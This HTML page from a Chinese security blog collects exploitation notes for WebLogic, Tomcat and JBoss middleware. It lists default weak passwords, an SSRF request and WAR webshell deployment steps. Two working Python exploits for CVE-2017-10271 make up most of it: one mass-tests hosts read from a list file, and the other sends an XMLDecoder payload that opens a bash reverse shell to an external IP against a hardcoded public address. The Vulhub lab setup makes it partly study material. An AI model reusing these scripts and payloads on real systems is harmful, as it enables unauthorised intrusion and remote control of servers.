<!DOCTYPE html>
<html lang="zh-Hans">

<head>
    <meta charset="UTF-8">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="Bywalks">



    <meta name="description" content="Bywalks个人博客(www.bywalks.com)关注网络安全、信息安全、网站建设、IT行业、网络安全文章、黑客技术、网络安全技术、网络安全知识、互联网安全知识、原创网络安全博客">


    <meta name="keywords" content="Bywalks个人博客,关注网络安全,信息安全,网站建设,安全博客,web安全,网站漏洞,网络安全,网络安全技术,网络安全知识,网络安全教程">


<title>中间件漏洞(不定时更新) | Bywalks&#39;s Blog - Bywalks个人博客|网络安全爱好者</title>



    <link rel="icon" href="/favicon.ico">




    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    
    <script src="/js/tocbot.min.js"></script>
    



    
    
        
    


<meta name="generator" content="Hexo 6.0.0"></head>

<body>
    <script>
        // this function is used to check current theme before page loaded.
        (() => {
            const currentTheme = window.localStorage && window.localStorage.getItem('theme') || '';
            const isDark = currentTheme === 'dark';
            const pagebody = document.getElementsByTagName('body')[0]
            if (isDark) {
                pagebody.classList.add('dark-theme');
                // mobile
                document.getElementById("mobile-toggle-theme").innerText = "· Dark"
            } else {
                pagebody.classList.remove('dark-theme');
                // mobile
                document.getElementById("mobile-toggle-theme").innerText = "· Light"
            }
        })();
    </script>

    <div class="wrapper">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/">Bywalks&#39;s Blog</a></div>
            <div class="menu navbar-right">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
                <input id="switch_default" type="checkbox" class="switch_default">
                <label for="switch_default" class="toggleBtn"></label>
            </div>
        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">Bywalks&#39;s Blog</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">&#9776; Menu</div>
            </div>
            <div class="menu" id="mobile-menu">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
            </div>
        </div>
    </nav>

</header>
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if(toggleMenu.classList.contains("active")){
           toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        }else{
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>
            <div class="main">
                <div class="container">
    
    
        <div class="post-toc">
    <div class="tocbot-list">
    </div>
    <div class="tocbot-list-menu">
        <a class="tocbot-toc-expand" onclick="expand_toc()">Expand all</a>
        <a onclick="go_top()">Back to top</a>
        <a onclick="go_bottom()">Go to bottom</a>
    </div>
</div>

<script>
    document.ready(
        function () {
            tocbot.init({
                tocSelector: '.tocbot-list',
                contentSelector: '.post-content',
                headingSelector: 'h1, h2, h3, h4, h5',
                collapseDepth: 1,
                orderedList: false,
                scrollSmooth: true,
            })
        }
    )

    function expand_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 6,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "collapse_toc()");
        b.innerHTML = "Collapse all"
    }

    function collapse_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 1,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "expand_toc()");
        b.innerHTML = "Expand all"
    }

    function go_top() {
        window.scrollTo(0, 0);
    }

    function go_bottom() {
        window.scrollTo(0, document.body.scrollHeight);
    }

</script>
    

    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">中间件漏洞(不定时更新)</h1>
            
                <div class="post-meta">
                    
                        Author: <a itemprop="author" rel="author" href="/">Bywalks</a>
                    

                    
                        <span class="post-time">
                        Date: <a href="#">January 3, 2018&nbsp;&nbsp;0:00:00</a>
                        </span>
                    
                    
                        <span class="post-category">
                    Category:
                            
                                <a href="/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/">网络安全</a>
                            
                        </span>
                    
                </div>
            
        </header>

        <div class="post-content">
            <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a><span style="color: #008000;">前言</span></h2><p><span style="font-family: 微软雅黑, 'Microsoft YaHei';">一篇叙述中间件漏洞的文章，总结一下一些中间件的漏洞的利用。</span></p>
<h2 id="渗透环境"><a href="#渗透环境" class="headerlink" title="渗透环境"></a><span style="color: #008000;">渗透环境</span></h2><p><span style="font-family: 微软雅黑, 'Microsoft YaHei';">在学习一个漏洞的时候，复现是必须要做的，毕竟看再多文章自己不复现下次遇到了这种漏洞还是不一定会有所印象，所以首先说的就是如何去找一些渗透环境。下面分为几种方法，这里只说下如何搭建Vulhub，其他的可以去官网看，都很详细。</span></p>
<ul>
<li><p><span style="font-family: 微软雅黑, 'Microsoft YaHei';">Vulhub，VulApps（基于Docker，只要几条命令）</span></p>
</li>
<li><p><span style="font-family: 微软雅黑, 'Microsoft YaHei';">ZoomEye，傻蛋（方便找一些实战环境）</span></p>
</li>
<li><p><span style="font-family: 微软雅黑, 'Microsoft YaHei';">Google，Bing（Google语法，Bing语法还是强大的）</span></p>
</li>
</ul>
<h3 id="Vulhub与VulApps"><a href="#Vulhub与VulApps" class="headerlink" title="Vulhub与VulApps"></a><span style="color: #008000;">Vulhub与VulApps</span></h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">Vulhub如何安装与使用</span><br><span class="line">安装</span><br><span class="line">apt install git docker.io docker-compose</span><br><span class="line">git clone https://github.com/vulhub/vulhub.git</span><br><span class="line"> </span><br><span class="line">进入漏洞环境</span><br><span class="line">cd vulhub/weblogic/ssrf/</span><br><span class="line"> </span><br><span class="line">自动化编译环境</span><br><span class="line">docker-compose build</span><br><span class="line"> </span><br><span class="line">启动整个环境</span><br><span class="line">docker-compose up -d</span><br><span class="line"> </span><br><span class="line">删除整个环境</span><br><span class="line">docker-compose down</span><br><span class="line"> </span><br><span class="line">VulApps想用的可以去GitHub看说明,两个项目地址放下面了</span><br><span class="line">https://github.com/vulhub/vulhub</span><br><span class="line">https://github.com/Medicean/VulApps</span><br></pre></td></tr></table></figure>

<h2 id="WebLogic"><a href="#WebLogic" class="headerlink" title="WebLogic"></a><span style="color: #008000;">WebLogic</span></h2><ul>
<li><p><span style="font-family: 微软雅黑, 'Microsoft YaHei';">弱口令</span></p>
</li>
<li><p><span style="font-family: 微软雅黑, 'Microsoft YaHei';">SSRF</span></p>
</li>
<li><p><span style="font-family: 微软雅黑, 'Microsoft YaHei';">反序列化</span></p>
</li>
</ul>
<h3 id="弱口令"><a href="#弱口令" class="headerlink" title="弱口令"></a><span style="color: #008000;">弱口令</span></h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">默认端口：7001</span><br><span class="line"></span><br><span class="line">默认后台：console/login/loginForm.jsp</span><br><span class="line"></span><br><span class="line">弱口令：weblogic/weblogic</span><br><span class="line"></span><br><span class="line">部署war步骤：部署&amp;nbsp;-&gt;&amp;nbsp;上传文件&amp;nbsp;-&gt;&amp;nbsp;选择文件&amp;nbsp;-&gt;&amp;nbsp;下一步&amp;nbsp;-&gt;&amp;nbsp;下一步&lt;/pre&gt;</span><br></pre></td></tr></table></figure>

<h3 id="SSRF"><a href="#SSRF" class="headerlink" title="SSRF"></a><span style="color: #008000;">SSRF</span></h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">CVE-2014-4241</span><br><span class="line"> </span><br><span class="line">漏洞地址：uddiexplorer/</span><br><span class="line"> </span><br><span class="line">EXP： </span><br><span class="line">GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&amp;txtSearchname=sdf&amp;txtSearchkey=&amp;txtSearchfor=&amp;selfor=Business+location&amp;btnSubmit=Search&amp;operator=http://127.0.0.1:7001 HTTP/1.1</span><br><span class="line">Host: localhost</span><br><span class="line">Accept: */*</span><br><span class="line">Accept-Language: en</span><br><span class="line">User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)</span><br><span class="line">Connection: close</span><br><span class="line"> </span><br><span class="line">通过返回值的不同来判断内网端口是否开放</span><br></pre></td></tr></table></figure>

<h3 id="反序列化"><a href="#反序列化" class="headerlink" title="反序列化"></a><span style="color: #008000;">反序列化</span></h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br></pre></td><td class="code"><pre><span class="line">CVE-2016-0638   </span><br><span class="line"> </span><br><span class="line">命令：python2 Weblogic.py （用的时候修改下Main里面的IP和端口）</span><br><span class="line"> </span><br><span class="line">CVE-2017-3248   weblogic_cmd.jar</span><br><span class="line"> </span><br><span class="line">命令：java -jar weblogic_cmd.jar -C ls -H IP -P 7001  </span><br><span class="line"> </span><br><span class="line">CVE-2017-10271(XMLDecode) </span><br><span class="line"> </span><br><span class="line">漏洞地址:http://45.32.80.225:7001/wls-wsat/CoordinatorPortType11(若地址存在则漏洞存在)</span><br><span class="line"> </span><br><span class="line">EXP  WriteTxt:</span><br><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line">headers = &#123; &#x27;Content-type&#x27;: &#x27;text/xml&#x27; &#125;</span><br><span class="line">data = &#x27;&#x27;&#x27;&lt;soapenv:Envelope xmlns:soapenv=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot;&gt;&lt;soapenv:Header&gt;&lt;work:WorkContext xmlns:work=&quot;http://bea.com/2004/06/soap/workarea/&quot;&gt;&lt;java&gt;&lt;java version=&quot;1.4.0&quot; class=&quot;java.beans.XMLDecoder&quot;&gt;&lt;object class=&quot;java.io.PrintWriter&quot;&gt;&lt;string&gt;servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/bywalks.txt&lt;/string&gt;&lt;void method=&quot;println&quot;&gt;&lt;string&gt;Weblogic_Test&lt;/string&gt;&lt;/void&gt;&lt;void method=&quot;close&quot;/&gt;&lt;/object&gt;&lt;/java&gt;&lt;/java&gt;&lt;/work:WorkContext&gt;&lt;/soapenv:Header&gt;&lt;soapenv:Body/&gt;&lt;/soapenv:Envelope&gt;&#x27;&#x27;&#x27;</span><br><span class="line">def exp(ip):</span><br><span class="line">    ip = ip.strip(&quot;\n&quot;)</span><br><span class="line">    url_post = ip + &quot;/wls-wsat/CoordinatorPortType11&quot;</span><br><span class="line">    url_myfile = ip + &quot;/bea_wls_internal/bywalks.txt&quot;</span><br><span class="line">    print(&quot;Test for &quot; + ip + &quot;.....&quot;)</span><br><span class="line">    r = requests.post(url=url_post,data=data,headers=headers)</span><br><span class="line">    r2 = requests.get(url_myfile)</span><br><span class="line">    if r2.status_code != 404:</span><br><span class="line">        print(&quot;Weblogic Vulnerable!!!&quot;)</span><br><span class="line">        print(&quot;You file path is &quot; + url_myfile)</span><br><span class="line">    else:</span><br><span class="line">        print(&quot;No Vulnerable!!!&quot;)</span><br><span class="line">    print(&quot;=================================================&quot;)</span><br><span class="line"> </span><br><span class="line">if __name__ == &#x27;__main__&#x27;:</span><br><span class="line">    Weblogic_IP_list = []</span><br><span class="line">    with open(&quot;weblogic.txt&quot;) as f:</span><br><span class="line">        Weblogic_IP_list = f.readlines()</span><br><span class="line">    for ip in Weblogic_IP_list:</span><br><span class="line">        try:</span><br><span class="line">            exp(ip)</span><br><span class="line">            sleep(1)</span><br><span class="line">        except:</span><br><span class="line">            pass</span><br><span class="line"></span><br><span class="line">EXP  ReturnShell:</span><br><span class="line">import requests</span><br><span class="line">headers = &#123; &#x27;Content-type&#x27;: &#x27;text/xml&#x27; &#125;</span><br><span class="line">data = &#x27;&#x27;&#x27;</span><br><span class="line">&lt;soapenv:Envelope xmlns:soapenv=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot;&gt;</span><br><span class="line">  &lt;soapenv:Header&gt;</span><br><span class="line">&lt;work:WorkContext xmlns:work=&quot;http://bea.com/2004/06/soap/workarea/&quot;&gt;</span><br><span class="line">&lt;java version=&quot;1.8.0_131&quot; class=&quot;java.beans.XMLDecoder&quot;&gt;</span><br><span class="line">  &lt;void class=&quot;java.lang.ProcessBuilder&quot;&gt;</span><br><span class="line">&lt;array class=&quot;java.lang.String&quot; length=&quot;3&quot;&gt;</span><br><span class="line">  &lt;void index=&quot;0&quot;&gt;</span><br><span class="line">&lt;string&gt;/bin/bash&lt;/string&gt;</span><br><span class="line">  &lt;/void&gt;</span><br><span class="line">  &lt;void index=&quot;1&quot;&gt;</span><br><span class="line">&lt;string&gt;-c&lt;/string&gt;</span><br><span class="line">  &lt;/void&gt;</span><br><span class="line">  &lt;void index=&quot;2&quot;&gt;</span><br><span class="line">&lt;string&gt;bash -i &gt;&amp; /dev/tcp/113.75.162.62/8888 0&gt;&amp;1&lt;/string&gt;</span><br><span class="line">  &lt;/void&gt;</span><br><span class="line">&lt;/array&gt;</span><br><span class="line">  &lt;void method=&quot;start&quot;/&gt;&lt;/void&gt;</span><br><span class="line">&lt;/java&gt;</span><br><span class="line">  &lt;/work:WorkContext&gt;</span><br><span class="line">&lt;/soapenv:Header&gt;</span><br><span class="line">  &lt;soapenv:Body/&gt;</span><br><span class="line">&lt;/soapenv:Envelope&gt;&#x27;&#x27;&#x27;</span><br><span class="line">def exp(ip):</span><br><span class="line">    print(&quot;Test for &quot; + ip + &quot; .....&quot;)</span><br><span class="line">    r = requests.post(url=ip,data=data,headers=headers)</span><br><span class="line">    print(r.status_code)</span><br><span class="line">    print(r.text)</span><br><span class="line"> </span><br><span class="line">if __name__ == &#x27;__main__&#x27;:</span><br><span class="line">    ip = &quot;http://45.32.80.225:7001/wls-wsat/CoordinatorPortType11&quot;</span><br><span class="line">    try:</span><br><span class="line">        exp(ip)</span><br><span class="line">    except:</span><br><span class="line">        pass</span><br></pre></td></tr></table></figure>

<h2 id="Tomcat"><a href="#Tomcat" class="headerlink" title="Tomcat"></a><span style="color: #008000;">Tomcat</span></h2><ul>
<li><p><span style="font-family: 微软雅黑, 'Microsoft YaHei';">弱口令</span></p>
</li>
<li><p><span style="font-family: 微软雅黑, 'Microsoft YaHei';">PUT上传</span></p>
</li>
</ul>
<h3 id="弱口令-1"><a href="#弱口令-1" class="headerlink" title="弱口令"></a><span style="color: #008000;">弱口令</span></h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">默认端口：8080</span><br><span class="line"> </span><br><span class="line">默认地址：manager/html</span><br><span class="line"> </span><br><span class="line">生成war命令(到shell的文件夹下)：jar -cvf shell.war ./    </span><br><span class="line"> </span><br><span class="line">部署war步骤：选择文件 -&gt; Deploy -&gt; 完成</span><br></pre></td></tr></table></figure>

<h3 id="PUT上传"><a href="#PUT上传" class="headerlink" title="PUT上传"></a><span style="color: #008000;">PUT上传</span></h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">本博客里面有EXP</span><br></pre></td></tr></table></figure>

<h2 id="Jboss"><a href="#Jboss" class="headerlink" title="Jboss"></a><span style="color: #008000;">Jboss</span></h2><ul>
<li><p><span style="font-family: 微软雅黑, 'Microsoft YaHei';">部署WAR</span></p>
</li>
<li><p><span style="font-family: 微软雅黑, 'Microsoft YaHei';">反序列化</span></p>
</li>
</ul>
<h3 id="部署WAR"><a href="#部署WAR" class="headerlink" title="部署WAR"></a><span style="color: #008000;">部署WAR</span></h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">默认端口：8080</span><br><span class="line"> </span><br><span class="line">默认后台：jmx-console</span><br><span class="line"> </span><br><span class="line">部署步骤：Jboss.deployment包下的flavor=URL.type=DeploymentSccanner -&gt; Add Url() -&gt; 远程上传 -&gt; deploy() -&gt; 访问即可</span><br></pre></td></tr></table></figure>

<h3 id="反序列化-1"><a href="#反序列化-1" class="headerlink" title="反序列化"></a><span style="color: #008000;">反序列化</span></h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">CVE-2015-8103   DeserializeExploit.jar</span><br><span class="line"> </span><br><span class="line">CVE-2017-12149  Jboss.jar</span><br></pre></td></tr></table></figure>
        </div>

        
            <section class="post-copyright">
                
                    <p class="copyright-item">
                        <span>Author:</span>
                        <span>Bywalks</span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>Permalink:</span>
                        <span><a href="http://bywalks.com/2018/01/03/%E4%B8%AD%E9%97%B4%E4%BB%B6%E6%BC%8F%E6%B4%9E(%E4%B8%8D%E5%AE%9A%E6%97%B6%E6%9B%B4%E6%96%B0)/">http://bywalks.com/2018/01/03/%E4%B8%AD%E9%97%B4%E4%BB%B6%E6%BC%8F%E6%B4%9E(%E4%B8%8D%E5%AE%9A%E6%97%B6%E6%9B%B4%E6%96%B0)/</a></span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>License:</span>
                        <span>Copyright (c) 2022 <a target="_blank" rel="noopener" href="http://creativecommons.org/licenses/by-nc/4.0/">CC-BY-NC-4.0</a> LICENSE</span>
                    </p>
                
                
                     <p class="copyright-item">
                         <span>Slogan:</span>
                         <span>Do you believe in <strong>DESTINY</strong>?</span>
                     </p>
                

            </section>
        
        <section class="post-tags">
            <div>
                <span>Tag(s):</span>
                <span class="tag">
                    
                    
                        <a href="/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/"># 网络安全</a>
                    
                        
                </span>
            </div>
            <div>
                <a href="javascript:window.history.back();">back</a>
                <span>· </span>
                <a href="/">home</a>
            </div>
        </section>
        <section class="post-nav">
            
                <a class="prev" rel="prev" href="/2018/01/04/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%EF%BC%88%E4%B8%AA%E4%BA%BA%E6%80%BB%E7%BB%93%EF%BC%89/">文件上传漏洞（个人总结）</a>
            
            
            <a class="next" rel="next" href="/2017/12/20/%E6%B5%85%E8%B0%88xxe/">浅谈XXE漏洞</a>
            
        </section>


    </article>
</div>

            </div>
            <footer id="footer" class="footer">
    <div class="copyright">
        <span>© Bywalks | Powered by <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/Siricee/hexo-theme-Chic" target="_blank">Chic</a><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <span id="busuanzi_container_site_pv">本站总访问量<span id="busuanzi_value_site_pv"></span>次</span></span>
    </div>
</footer>

    </div>
</body>

</html>